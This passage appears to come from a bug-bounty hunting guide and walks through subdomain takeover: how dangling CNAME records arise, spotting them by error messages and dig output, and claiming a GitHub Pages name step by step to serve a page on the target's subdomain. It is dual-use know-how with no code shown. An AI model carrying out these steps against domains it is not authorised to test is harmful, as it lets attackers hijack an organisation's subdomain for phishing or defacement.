Another extremely popular vulnerability is subdomain takeover. Though this vulnerability has died down significantly it is still very common in the wild. If you are unfamiliar with this type of vulnerability according to Google “Subdomain takeover attacks are a class of security issues where an attacker is able to seize control of an organization’s subdomain via cloud services like AWS or Azure”.
A subdomain takeover occurs when a subdomain is pointing to another domain (CNAME) that no longer exists. If an attacker were to register the non existing domain then the target subdomain would now point to your domain effectively giving you full control over the target’s subdomain. What makes this vulnerability so interesting is that you can be safe one minute and a single DNS change can make you vulnerable the next minute.
The vulnerability here is that the target subdomain points to a domain that does not exist. An attacker can then register the non-existing domain. Now the target subdomain will point to a domain the attacker controls.
If you’re planning on hunting for this vulnerability, you are definitely going to be referencing the following GitHub page as it contains a bunch of examples and walkthroughs on exploiting different providers:
As you can see above this page contains a large list of engines who can be exploited by this vulnerability. If you click on the issue number, it will give you a walk through exploiting that particular engine. Because every provider has its own way of registering domains you will need to learn the process of registering a domain on the engine that impacts your target.
One of the easiest ways to spot a subdomain takeover vulnerability is by the error message it throws as shown below:
Now that we have an indicator this site is vulnerable we need to get the github page the vulnerable subdomain is pointing to. We need this information so we can register the
domain through github.
As shown above a “dig” command can be used to gather the DNS records of the vulnerable domain. We can also see that the domain points to the github page “ghostlulzvulntakeover.github.io”, if we can register this domain we win. To figure out the process of registering a domain on Github you can Google it or you can follow the tutorial in the subdomain takeover github page as shown below:
Now that we know the steps to register a domain on Github we just need to do it. First I created a Github repo with the same name as the CNAME record:
After that create an “index.html” file in the repo as shown below:
The next step is to set the repo as the main branch.
Finally specify the target domain you are going after.
That’s it! Now when you visit the target domain you should see the page you set up.
We WIN! As you can see above we successfully exploited the subdomain takeover vulnerable and got our page to appear on the targets subdomain. Note that this is the process for Github, if your target is vulnerable to something else you will have to follow the steps for that provider. Lucky for us all this is documented on the subdomain takeover github wiki.
A few years ago, subdomain takeover was all over the place, but it has started to die down recently. However, you will still find plenty of organizations vulnerable to this type of attack. It is extremely easy to pull off and it allows attackers to completely take over the target subdomain. If you’re looking for an easy high security finding this, is it.